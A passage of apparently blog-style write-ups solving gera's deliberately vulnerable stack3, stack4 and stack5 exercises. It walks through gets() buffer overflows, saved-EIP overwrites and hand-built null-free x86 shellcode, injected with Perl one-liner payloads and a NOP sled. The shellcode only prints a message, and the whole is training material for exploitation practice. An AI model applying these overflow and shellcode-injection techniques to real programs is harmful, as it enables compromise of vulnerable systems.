Insecure Programming by Example: shellcode & stack5.c


Now it’s time for Insecure Programming by Example exercise stack5.c, and in the interest of brevity I’ll just go ahead and post the damned thing.

/* stack5-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
        int cookie;
        char buf[80];

        printf("buf: %08x cookie: %08x\n", &buf, &cookie);
        gets(buf);      /* no bounds check: input can run past buf */

        if (cookie == 0x000d0a00)
                printf("you loose!\n");
}

So, what’s new in this version…oh wait, if we set the cookie correctly, it prints out “you loose!”…so what the heck are we supposed to do now?

The answer lies with shellcode. Basically, we are given a buffer to work with, and we need to put instructions directly in the buffer in the form of raw bytes, and jump execution to a point where our shellcode will run. That’s pretty much it. The concept should be pretty familiar at this point, and as you’ll see the execution is not so hard.

Epic Sploits

It’s worth mentioning that these programs are purposely designed to be exploited, and the techniques we are using are among the most basic when it comes to this sort of thing. Though I have no experience in this line of work professionally, it cannot all be this straightforward. If you want an example of something truly advanced, explained so even I can grasp the basics, go check out Thomas Ptacek’s write-up of Mark Dowd’s Flash NULL pointer exploit. It gives us a glimpse into what the truly advanced techniques look like, and Thomas does an excellent job of explaining not only how it works (generally) but why it’s such a big deal.

So if I act like I know what I’m talking about, just understand that this is a very useful foundation that we are building together, and if you have enjoyed yourself so far, you will not be bored, because there will be plenty of work to do.


There are many ways we can attack the problem of developing the shellcode and making it available to the process to be executed. Thanks to the Internet, there are many resources where sample shellcode for all sorts of different systems can be referenced or even automatically generated. But in this brief article I’ll take you through the manual generation of shellcode and then the process of getting it to run on the vulnerable program step-by-step. Hacking: The Art of Exploitation’s chapter on shellcode was heavily used as a reference for my original solution (which I can no longer remember), and I’m sure I’ll go back there for more looks in the course of writing this post.

Abstractions of Abstractions

NOTE: This is an area I’m still learning a lot about, if I gloss something over to the point that it’s incorrect or inaccurate, please let me know and I’ll fix it.

So, let’s talk real quick about the difference between instructions, system calls, and C library functions or calls.  Essentially, at the lowest level you have x86 assembly instructions, like push, pop, call, mov, and ret. These instructions are hard coded into the logic of the processor, and though the implementation of them in actual transistor logic may change, you generally won’t see the interface to the instruction change at all (for instance, the number or type of arguments it takes). The list of instructions (and of course the registers) that a processor supports is essentially what makes a processor x86-compatible.

NOTE: in the course of doing research for this article, it seems like the system calls and the C library functions are typically both implemented via libc, or in the libc project/package/whatever. The distinction between the two I’m observing here is valid, because they are used two completely different ways, and are even parts of a different set of standards each. I’d think of them as two sides of the same coin, but I’m sure that analogy breaks down as all do at some point.

The next layer up is kernel system calls. A system call is a numbered entry point into the kernel: a program loads the call number and its arguments into registers and then traps into the kernel (on 32-bit x86 Linux, with int 0x80), and the kernel “does stuff” with the given arguments. The thin wrapper functions you normally call from C live in libc (typically in /lib). System calls are not inherent to the x86 processor; rather, they are inherent to the kernel and operating system that you are using at the time. The kernel code behind them is mostly C with some assembly (everything ends up as machine instructions eventually), and their purpose (along with the entire kernel, really) is to provide a standardized interface to the hardware of the system. Any time you print something to the screen, type something, use your microphone to record something, or listen to music through your headphones, you are using the standard resources provided by the kernel and the kernel’s system calls to do so. For the curious, we have not yet used system calls directly (only through further-up abstractions such as printf(), which we’ll talk about next) but we will make extensive use of them when we write our shellcode.

The final and highest layer of abstraction we’ll deal with is the C standard library functions, declared in the various header files typically located in /usr/include on your average Linux distribution and implemented in libc. The C standard library is defined through an ISO standard, and each operating system that wants to offer C capabilities past what the compiler provides, in a way consistent with other operating systems or kernels, needs to implement the standard functions the library defines. Every time you use #include <stdio.h> to call printf(), or #include <string.h> to call strcpy(), you are using functions defined by the ISO standard for C and implemented in libc, which is mapped into the memory of every process that links against it (at a predictable location when ASLR is disabled).

Oh boy, this section sure does gloss over quite a bit that might be worth mentioning. I’m sure it will come up at some point later on. In the meantime, if you want to do some extracurricular reading, a great reference, perhaps the only one you’ll ever need, is Advanced Programming in the UNIX Environment by W. Richard Stevens and Stephen Rago. It’s a bit above my head, but it will serve you well if you ever need to look something up…ever.  If you want a gentler introduction that is very outdated but still quite informative and fun to read, I’d recommend The UNIX Programming Environment by Brian Kernighan and Rob Pike. I read this book and really liked it.

Enough Edumacation, Let’s Break Shit

Now I’m going to briefly outline how to build the shellcode we’re going to use, and then again briefly talk about some quick optimizations you can do to get rid of null bytes and wasted space in the shellcode. This is not super important for the gets() function, but if you are using something like strcpy() in the future or something else null terminated to get your shellcode into memory it will prematurely terminate the function.

We are going to use the write() system call for Linux to actually print out our string. I guess that there are others that are available to print output to a file descriptor (STDOUT in our case), and I was hoping to find where printf() or puts() from the C standard library directly referenced the write() system call to satisfy personal curiosity, but couldn’t.
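If you want to poke at write() without writing any assembly yet, here is a minimal sketch in Python (my pick for illustration; nothing in the exercise itself uses it). Python documents os.write() as writing bytes to a file descriptor and returning the number of bytes written, which is the same fd/buffer/count shape as the system call. The helper name write_through_pipe is made up, and I use a pipe instead of STDOUT only so the result can be read back and checked.

```python
import os

def write_through_pipe(message):
    """Push `message` through write() on a pipe and read it back.

    Hypothetical helper for illustration: returns (bytes_written, bytes_read_back).
    """
    read_fd, write_fd = os.pipe()
    try:
        # Same shape as the syscall: a file descriptor plus a buffer;
        # the return value is the number of bytes actually written.
        written = os.write(write_fd, message)
        echoed = os.read(read_fd, written)
    finally:
        os.close(read_fd)
        os.close(write_fd)
    return written, echoed

if __name__ == "__main__":
    count, data = write_through_pipe(b"you win!\n\r")
    print(count, data)
```

Swapping the pipe's write end for file descriptor 1 would send the same bytes to STDOUT, which is what our shellcode will do.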

Assembly code can be written using mnemonics, which are basically English-like names that correspond directly to the numeric opcodes (one or more bytes each) that make up the actual machine language the processor understands. Whenever we use push or something like it with an argument after it, or whenever we see it in the output of objdump -D or another disassembler, we need to remember that it’s just another abstraction. The job of turning mnemonic instructions into actual machine language is that of the assembler. The assembler we’re going to use is a fairly standard and free one called the Netwide Assembler (nasm).
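To make the “mnemonics are just names for bytes” idea concrete, here is a toy sketch in Python. The table only holds the handful of encodings that appear in the ndisasm output later in this post; OPCODES and toy_assemble are made-up names, and a real assembler like nasm also handles operands, labels, and addressing modes that this completely ignores.

```python
# Toy lookup table: mnemonic text -> machine-code bytes (as hex).
# Encodings are copied from the ndisasm listing later in this post;
# the names OPCODES and toy_assemble are hypothetical.
OPCODES = {
    "pop ecx": "59",
    "xor eax,eax": "31c0",
    "mov al,0x4": "b004",
    "xor ebx,ebx": "31db",
    "inc ebx": "43",
    "xor edx,edx": "31d2",
    "mov dl,0x8": "b208",
    "int 0x80": "cd80",
    "mov al,0x1": "b001",
    "dec ebx": "4b",
}

def toy_assemble(lines):
    """Translate each known mnemonic line into bytes and concatenate them."""
    return b"".join(bytes.fromhex(OPCODES[line]) for line in lines)

program = [
    "pop ecx", "xor eax,eax", "mov al,0x4", "xor ebx,ebx", "inc ebx",
    "xor edx,edx", "mov dl,0x8", "int 0x80", "mov al,0x1", "dec ebx", "int 0x80",
]
print(toy_assemble(program).hex())
```

The hex it prints should line up with offsets 0x02 through 0x14 of the final shellcode's hexdump, which is all a disassembler is doing in reverse.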

section .data  ; data segment
msg   db "you win!", 0x0a, 0x0d ; the string to print with newline at the end

section .text  ; text segment, where the code is
global _start  ; default entry point for ELF linking

; SYSCALL: ssize_t write(int fd, const void *buf, size_t count);
; Our syscall: write(1, msg, 10)
mov eax, 4  ; put 4 into EAX register, syscall write is #4 (/usr/include/asm-i386/unistd.h)
mov ebx, 1  ; put 1 into EBX, since file descriptor we want is STDOUT
mov ecx, msg   ; Put the address of the string pointer into ECX, since it's what we want to print
mov edx, 10 ; put 10 into EDX, since string is 10 bytes (with crlf at the end)
int 0x80 ; tell the kernel to do a syscall

; SYSCALL: void _exit(int status);
; Our syscall: exit(0) meaning that there were no problems
mov eax, 1  ; put 1 into EAX since exit() is syscall #1
mov ebx, 0  ; put 0 into EBX, since that's our one and only argument to exit()
int 0x80 ; tell the kernel to do a syscall

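The above code is an example of how one might write a program in assembly to print out “you win!”. The code is commented, and the comments explain each step. If we wanted to assemble this code into a proper ELF binary for Linux, we’d have to assemble the code into an object file with nasm, and then link the executable by running the ld command. Note that the listing declares _start global but never defines a _start: label, which is why ld warns below and falls back to the start of the text section; that happens to be our first instruction, so the program still runs.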

hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.asm
printyouwin.asm: ASCII English text
hacking@hacking-theart:~/InsecureProgramming $ nasm -f elf printyouwin.asm
hacking@hacking-theart:~/InsecureProgramming $ ls -la printyouwin.*
-rwxr--r-- 1 hacking hacking 651 2009-12-12 11:08 printyouwin.asm
-rw-r--r-- 1 hacking hacking 544 2009-12-12 11:09 printyouwin.o
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.o
printyouwin.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ld -o printyouwin printyouwin.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048060
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin
printyouwin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
hacking@hacking-theart:~/InsecureProgramming $ ./printyouwin
you win!

This is all well and good, however since we are using our shellcode within another already-started process, we won’t have the ability to reference the memory in the various sections of the executable to retrieve static values such as the string “you win!” which will be passed as an argument to the write() call. Since we know the other integer values for the 2 remaining arguments to write(), and can provide them directly, that is not such an issue because we can populate those registers with a mov instruction. But we need a way to get the string value we want to print into the ECX register, so write() will print it out for us. Enter the stack.

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "you win!",  0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 10       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 10)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

This code uses a trick of the call instruction: call pushes the address of whatever immediately follows it (here, our string) onto the stack as the return address, and the first instruction at the call target pops that address back off of the stack into the ECX register. That address is used as a pointer to the string that we want to print.
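Here is a small sketch of the arithmetic behind that trick, written in Python. It decodes a near call (opcode 0xE8 followed by a signed 32-bit little-endian displacement) and reports both where execution goes and which address gets pushed. The function name call_target_and_return is made up, and the bytes are the first 16 bytes of the assembled shellcode shown in the hexdump further down.

```python
import struct

def call_target_and_return(code, offset):
    """Decode a near `call rel32` (opcode 0xE8) located at `offset` in `code`.

    Returns (target, return_address) as offsets into `code`.
    Hypothetical helper for illustration only.
    """
    if code[offset] != 0xE8:
        raise ValueError("not a call rel32 instruction")
    # The displacement is a signed 32-bit little-endian integer.
    (rel,) = struct.unpack_from("<i", code, offset + 1)
    return_address = offset + 5      # first byte after the 5-byte call
    target = return_address + rel    # displacement is relative to that byte
    return target, return_address

blob = bytes.fromhex("e80a000000") + b"you win!\n\r" + b"\x59"
target, ret = call_target_and_return(blob, 0)
print(hex(target), hex(ret), blob[ret:target])
```

The pushed return address (offset 5) is exactly where the string starts, and the target (offset 0xf) is the pop ecx that picks it up.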

We’ll want to translate this code not to the ELF format, but to raw machine instructions, since we want to inject this code into a running process. To do this, we’ll run nasm without a format argument (it defaults to a flat binary), then I’ll show you how many bytes the assembled shellcode takes up, and what it looks like when disassembled. Remember that we only control the 80-byte buffer plus the handful of bytes between it and the saved return address, so our shellcode cannot be too bloated.

hacking@hacking-theart:~/InsecureProgramming $ nasm -o printyouwin1 printyouwin1.asm
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin1*
printyouwin1:     data
printyouwin1.asm: ASCII English text
printyouwin1.o:   ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ls -l printyouwin1
-rw-r--r-- 1 hacking hacking 45 2009-12-12 11:57 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ wc -c printyouwin1
45 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C printyouwin1
00000000  e8 0a 00 00 00 79 6f 75  20 77 69 6e 21 0a 0d 59  |.....you win!..Y|
00000010  b8 04 00 00 00 bb 01 00  00 00 ba 0a 00 00 00 cd  |................|
00000020  80 b8 01 00 00 00 bb 00  00 00 00 cd 80           |.............|
hacking@hacking-theart:~/InsecureProgramming $ objdump -D printyouwin1
objdump: printyouwin1: File format not recognized
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 printyouwin1
00000000  E80A000000        call 0xf
00000005  796F              jns 0x76
00000007  7520              jnz 0x29
00000009  7769              ja 0x74
0000000B  6E                outsb
0000000C  210A              and [edx],ecx
0000000E  0D59B80400        or eax,0x4b859
00000013  0000              add [eax],al
00000015  BB01000000        mov ebx,0x1
0000001A  BA0A000000        mov edx,0xa
0000001F  CD80              int 0x80
00000021  B801000000        mov eax,0x1
00000026  BB00000000        mov ebx,0x0
0000002B  CD80              int 0x80

This shellcode, while awesome, is not foolproof for many scenarios. If we are using the gets() function, we cannot include a newline (0x0a) anywhere in our payload, because it will prematurely terminate gets(). If we are using other typical string-based functions such as strcpy(), the null bytes will kill us by prematurely terminating those functions as well. Here is a slimmed-down version of the shellcode that uses various techniques: loading values into the low byte of a register (al, dl) instead of the full 32 bits, XORing registers against themselves to zero them out first, smaller instructions such as jmp short to eliminate further null bytes, and calling back up into memory so that the negative offset is encoded in two’s complement as 0xff bytes instead of nulls. It also drops the 0x0a and 0x0d bytes from the end of the string, since the newline would terminate gets() prematurely.

BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx      ; Zero out edx.
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 8)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1; eax holds write()'s return value (8), so the top 3 bytes are zero.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; with no newline or carriage return bytes.

And here is us, assembling the code and then putting it into the buffer, prefixed with a NOP sled to be executed successfully! You win!

hacking@hacking-theart:~/InsecureProgramming $ nasm -o stack5shellcode.out stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ md5sum stack5shellcode*
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode
0f2668754e312f90cef8dff7f6c90723  stack5shellcode.bytes
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode.out
bd6be6a87c2eee6e0fab27f13ba5853d  stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 stack5shellcode.out
00000000  EB13              jmp short 0x15
00000002  59                pop ecx
00000003  31C0              xor eax,eax
00000005  B004              mov al,0x4
00000007  31DB              xor ebx,ebx
00000009  43                inc ebx
0000000A  31D2              xor edx,edx
0000000C  B208              mov dl,0x8
0000000E  CD80              int 0x80
00000010  B001              mov al,0x1
00000012  4B                dec ebx
00000013  CD80              int 0x80
00000015  E8E8FFFFFF        call 0x2
0000001A  796F              jns 0x8b
0000001C  7520              jnz 0x3e
0000001E  7769              ja 0x89
00000020  6E                outsb
00000021  21                db 0x21
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C stack5shellcode.out
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
hacking@hacking-theart:~/InsecureProgramming $ perl -e 'print "\x90" x 74 . "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "\xb0\xf7\xff\xbf\n";' | ./stack5
buf: bffff7b0 cookie: bffff80c
you win!hacking@hacking-theart:~/InsecureProgramming $ 

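I wanted to make sure that a NOP sled was an understood concept: a run of 0x90 (nop) bytes in front of the shellcode, so that a return address landing anywhere in the run slides down into the shellcode. Since the program prints the exact address of buf, though, we could have just as easily put the shellcode at the very beginning of the buffer, padded the rest with junk, and executed all the same.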

root@hacking-theart:/home/hacking/InsecureProgramming # perl -e 'print "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "A" x 74 . "\x80\xf7\xff\xbf\n";' | ./stack5
buf: bffff780 cookie: bffff7dc
you win!root@hacking-theart:/home/hacking/InsecureProgramming #
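
Both Perl one-liners above build the same shape of payload, so here is a rough Python sketch of that layout. The names build_payload and STACK5_SHELLCODE are made up; the 108-byte offset and the return addresses are the ones from my runs above (the addresses are whatever the program prints for buf on your system, so expect yours to differ).

```python
import struct

# The 34-byte shellcode from the hexdump above.
STACK5_SHELLCODE = bytes.fromhex(
    "eb135931c0b00431db4331d2b208cd80"
    "b0014bcd80e8e8ffffff796f75207769"
    "6e21"
)

def build_payload(shellcode, offset, ret_addr, sled_first=True):
    """Fill `offset` bytes with shellcode plus padding, then append the return address.

    Hypothetical helper: `offset` is the distance from buf to the saved
    return address, `ret_addr` is where we want execution to land.
    """
    pad_len = offset - len(shellcode)
    if pad_len < 0:
        raise ValueError("shellcode does not fit before the saved return address")
    if sled_first:
        body = b"\x90" * pad_len + shellcode   # NOP sled, then shellcode
    else:
        body = shellcode + b"A" * pad_len      # shellcode first, junk after
    # x86 is little-endian; the trailing newline ends gets().
    return body + struct.pack("<I", ret_addr) + b"\n"

sled_payload = build_payload(STACK5_SHELLCODE, 108, 0xbffff7b0)
junk_payload = build_payload(STACK5_SHELLCODE, 108, 0xbffff780, sled_first=False)
print(len(sled_payload), sled_payload[-5:])
```

Writing either payload to the program's standard input (for example with sys.stdout.buffer.write() and a pipe) would stand in for the perl -e commands.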

And that (finally) wraps us up for the stackN.c series of stack buffer overflows designed and provided for free by gera of Core. I’ll probably never, ever write about these again, it was pretty laborious, but I hope you didn’t find reading about it so. I used very many references through completing these write-ups, and I recommend them all, but if you can’t afford to go out and buy $500.00 worth of new books, you might want to check out the Safari Books Online site that O’Reilly offers, as it’s a pretty good deal (though less so now that they eliminated the 5-book shelf :-(). The Internet and Google (and Bing!) are your friends as well. Go forth, and break things!


Insecure Programming by Example: controlling EIP, stack4.c

Note: I couldn’t get this exploit to work on Debian 5, I think there must be some overflow protection or something I was working against on top of the ASLR I had already disabled. So I moved to the Hacking: The Art of Exploitation LiveCD, but any much older Linux should work for you (think Red Hat 7).

Ok, so everyone, before reading this one, repeat after me:

The goal is to control execution. The goal is to win. It doesn’t matter how you control things, or how you win, just win. Control is everything.

That may sound a little melodramatic, but I remember having a really hard time with stack4.c, not because the concepts were hard to grasp, but because I kept trying to control execution of the program the way I had in the previous three challenges, instead of just winning any way I could. That to me is the fundamental thing this challenge is attempting to teach the student. This particular challenge is not really about controlling EIP (though you will learn how to do that), rather, it’s about changing the way you think about computer programs in general. The point being that they do not always do what we think we told them to do, they do exactly what we told them to do ;-).

If you want to read a quick’n’dirty description of the right mindset for this sort of thing, along with some ideas on how to proceed if you want to be good at being bad, I highly recommend @kmx2600’s article on the VRT blog, “How do I become a ninja?”. Indeed, those are the steps that I’m now following to better myself in this arena, and I’m the one that asked his team the question in the first place, so it’s only appropriate I should share my progress so others might get bitten by the bug as well.

On to the bug!

/* stack4-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);	/* no bounds check: input can run past buf */

	if (cookie == 0x000d0a00)
		printf("you win!\n");
}

So…this may be tricky. Can anyone see why? See, they want us to make the cookie value equal to 0x000d0a00…can anyone spot the problem with this, alluded to in a previous post? That’s right, we can’t set the cookie variable to the appropriate value via the gets() function, because gets() terminates on a newline character, otherwise known as 0x0A. So we are going to need to find a way to win without setting the value of the cookie variable directly.
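To see the problem byte by byte, here is a small Python sketch that lays a cookie value out the way x86 stores it in memory (little-endian) and checks whether gets() would read all of it. The names cookie_bytes and survives_gets are made up, and survives_gets only models the newline rule, nothing else about gets().

```python
import struct

def cookie_bytes(value):
    """Return the four bytes of a 32-bit value in x86 (little-endian) memory order."""
    return struct.pack("<I", value)

def survives_gets(data):
    """True if gets() would read all of `data`, i.e. it contains no newline byte."""
    return b"\n" not in data

# stack3's cookie versus stack4's cookie.
for cookie in (0x01020005, 0x000d0a00):
    raw = cookie_bytes(cookie)
    print(hex(cookie), raw.hex(), survives_gets(raw))
```

The stack3 value passes through untouched, while the stack4 value has 0x0a as its second byte in memory, so gets() would stop reading right there.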

How else could we win? Think back to the beginning of this post: the object of the game is to take control of execution any way we’d like to. We want the program to print out “you win!”. If we look at this program in a debugger, from the assembly language perspective, a way to do this might become clear.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./stack4
Using host libthread_db library "/lib/tls/i686/cmov/".
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483b4 <main+0>:    push   ebp
0x080483b5 <main+1>:    mov    ebp,esp
0x080483b7 <main+3>:    sub    esp,0x78
0x080483ba <main+6>:    and    esp,0xfffffff0
0x080483bd <main+9>:    mov    eax,0x0
0x080483c2 <main+14>:   sub    esp,eax
0x080483c4 <main+16>:   lea    eax,[ebp-12]
0x080483c7 <main+19>:   mov    DWORD PTR [esp+8],eax
0x080483cb <main+23>:   lea    eax,[ebp-104]
0x080483ce <main+26>:   mov    DWORD PTR [esp+4],eax
0x080483d2 <main+30>:   mov    DWORD PTR [esp],0x80484d4
0x080483d9 <main+37>:   call   0x80482d4 <printf@plt>
0x080483de <main+42>:   lea    eax,[ebp-104]
0x080483e1 <main+45>:   mov    DWORD PTR [esp],eax
0x080483e4 <main+48>:   call   0x80482b4 <gets@plt>
0x080483e9 <main+53>:   cmp    DWORD PTR [ebp-12],0xd0a00
0x080483f0 <main+60>:   jne    0x80483fe <main+74>
0x080483f2 <main+62>:   mov    DWORD PTR [esp],0x80484ec
0x080483f9 <main+69>:   call   0x80482d4 <printf@plt>
0x080483fe <main+74>:   leave
0x080483ff <main+75>:   ret
End of assembler dump.

This is where some very basic knowledge of x86 assembly language will pay off (and I mean very basic, as I am certainly no expert). The section from main+53 through main+69 above is essentially equal to the C statement:


if (cookie == 0x000d0a00)
	printf("you win!\n");

I’ll leave it to the reader to read some intros on x86 assembly programming, or better yet, to read the excellent “Programming from the Ground Up” by Jonathan Bartlett, but it should be plain from the listing above what is occurring. Here is a summary with the details glossed over a bit.

First, we call the gets() function to get our input with call 0x80482b4. When it returns, cmp compares the 4-byte value (DWORD) stored 12 bytes below the frame pointer, at [ebp-12], which is our cookie variable, with the hex value 0xd0a00. (The square brackets mean “the value stored at this address”; read a book on C if you don’t get the pointer stuff, it’s important.) Keeping the result of that comparison in mind (using the EFLAGS register, another important thing to understand), we then implement the if statement using the jne instruction, which stands for “jump if not equal”. If the comparison was not equal, it jumps execution past the printf() call set up at 0x080483f2, which would print out our “you win!” statement. That’s how the if/then construct in C ends up looking in assembly.

The important thing to take away here is that if we want to print out “you win!”, we simply need to get the instructions at 0x080483f2 to be executed. The easiest way to do that is to get EIP to point there, and the easiest way to do that is to overwrite the saved copy of EIP (the return address) that is stored on the stack while main() executes. Essentially, any time a function is called, such as gets(), printf(), or even main(), which is what we are counting on here, the return address (the address where execution resumes once the function finishes) is pushed onto the stack, where it sits alongside the function’s local variables. That means that if the program flow allows us to get to the point where the function returns, and we can write an arbitrary amount of data to the stack with a bad function such as gets(), we can pretty much do whatever we want!

The game plan is to figure out where the return address is stored during the execution of the main() call, determine its distance from the buf variable, and figure out if we can overwrite it with the value 0x080483f2…if we can do this, we win. Let’s explore the state of the program at the time gets() is called using our debugger. Specifically, we want to see the state of the stack, and the best way to do this is to examine stack frames with the backtrace command. The commands to watch for below are break, backtrace, info frame, print, and x, as a few of them are new ones you’ll want to have in your back pocket in the future.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./stack4
Using host libthread_db library "/lib/tls/i686/cmov/".
(gdb) set disassembly-flavor intel
(gdb) break gets
Function "gets" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (gets) pending.
(gdb) run
Starting program: /home/hacking/InsecureProgramming/stack4
Breakpoint 2 at 0xb7ef21c6
Pending breakpoint "gets" resolved
buf: bffff770 cookie: bffff7cc

Breakpoint 2, 0xb7ef21c6 in gets () from /lib/tls/i686/cmov/
(gdb) backtrace
#0  0xb7ef21c6 in gets () from /lib/tls/i686/cmov/
#1  0x080483e9 in main () at stack4.c:11
(gdb) info frame 0
Stack frame at 0xbffff760:
 eip = 0xb7ef21c6 in gets; saved eip 0x80483e9
 called by frame at 0xbffff7e0
 Arglist at 0xbffff758, args:
 Locals at 0xbffff758, Previous frame's sp is 0xbffff760
 Saved registers:
  ebp at 0xbffff758, eip at 0xbffff75c
(gdb) info frame 1
Stack frame at 0xbffff7e0:
 eip = 0x80483e9 in main (stack4.c:11); saved eip 0xb7eafebc
 caller of frame at 0xbffff760
 source language c.
 Arglist at 0xbffff7d8, args:
 Locals at 0xbffff7d8, Previous frame's sp is 0xbffff7e0
 Saved registers:
  ebp at 0xbffff7d8, eip at 0xbffff7dc
(gdb) print 0xbffff7dc - 0xbffff770
$1 = 108
(gdb) next
Single stepping until exit from function gets,
which has no line number information.
main () at stack4.c:13
13              if (cookie == 0x000d0a00)
(gdb) x 0xbffff7dc
0xbffff7dc:     0x42424242

What we’re seeing here is that the stored EIP for the main() stack frame is 108 bytes from the buf variable’s start position. In essence, each memory address refers to a single byte of storage, so by calculating the difference between two addresses we know exactly how many bytes we must send to overflow the stored EIP in the stack. Since a single ASCII-encoded character is exactly one byte long, I went ahead and sent 108 “A” characters with 4 “B” characters tacked onto the end to overflow the stored EIP, and examining that memory address directly it worked.
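The same arithmetic is easy to script. This is a minimal Python sketch, assuming the addresses from my gdb session above (yours will differ) and the 0x080483f2 target from the disassembly; offset_between and overwrite_return are made-up names.

```python
import struct

def offset_between(buf_addr, saved_eip_addr):
    """Number of bytes from the start of buf to the saved return address."""
    return saved_eip_addr - buf_addr

def overwrite_return(buf_addr, saved_eip_addr, new_eip, filler=b"A"):
    """Pad up to the saved return address, then write `new_eip` little-endian.

    Hypothetical helper; the trailing newline is what makes gets() return.
    """
    padding = filler * offset_between(buf_addr, saved_eip_addr)
    return padding + struct.pack("<I", new_eip) + b"\n"

# Addresses taken from the gdb session above.
offset = offset_between(0xbffff770, 0xbffff7dc)
test_payload = overwrite_return(0xbffff770, 0xbffff7dc, 0x42424242)   # the "BBBB" probe
real_payload = overwrite_return(0xbffff770, 0xbffff7dc, 0x080483f2)
print(offset, test_payload[-5:], real_payload[-5:])
```

Only the distance between the two addresses matters here, which is why the same 108-byte padding keeps working even when the stack moves around a little between runs.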

So, let’s try our exploit now, knowing that 108 bytes is our offset to the saved return address. The code will fully execute, it will just jump back up the execution path on attempting to exit the first time and print out the “you win!” message, and then it will exit gracefully as if nothing had happened. Or at least, that’s the idea.

hacking@hacking-theart:~ $ perl -e 'print "A" x 108 . "\xf2\x83\x04\x08\n";' | ~/InsecureProgramming/stack4
buf: bffff790 cookie: bffff7ec
you win!
Segmentation fault

Ok, so, that worked! We still need to figure out why it segfaulted, and also why I couldn’t do this on the Debian 5 machine, but I’ll leave those subjects for future articles. Thanks for reading, hope you learned something.

Insecure Programming by Example: ruminations on stack3.c

So, last things first on this one: let’s get the solution out of the way, and then we can talk about why exactly this challenge was so easy, and how it could be written to teach something. I’m not sure, but I think this one may have been an oversight on gera’s part…either way, let’s talk it through and hopefully teach something along the way.

Here is Insecure Programming by Example stack3.c:

/* stack3-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);	/* no bounds check: input can run past buf */

	if (cookie == 0x01020005)
		printf("you win!\n");
}

And here is the solution:

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack3 stack3.c
/tmp/cci2jW0e.o: In function `main':
/home/mishley/InsecureProgramming/stack3.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# perl -e 'print "A" x 80 . "\x05\x00\x02\x01" . "\n";' | ./stack3
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

Now, on to why this one was so easy and conceptually no different from the prior challenge. I believe gera was trying to teach us to be aware of null-byte termination of strings within memory. Basically, a lot of string functions from the ANSI C standard do whatever it is they are supposed to do until they hit a null byte (null being 0x00), and most strings in memory are terminated using null bytes because of this. The most infamous example of a function that stops at a null byte is strcpy() from string.h. The thing is, gets() does not terminate on a null byte; instead it stops at a newline (0x0A) or at end-of-file (EOF is a condition reported by the input stream rather than a byte value; 0x04 is just the Ctrl-D keystroke a terminal uses to signal it). That is why the 0x00 in the middle of this cookie value sails right through. It will be important to know how the heck functions terminate input in upcoming examples in the stackN.c series and also in the further-along aboN.c series (which I have not yet completed). I thought it was important to explore why this one was so easy though, and to give the reader some food for thought as to how this might affect them in the future.
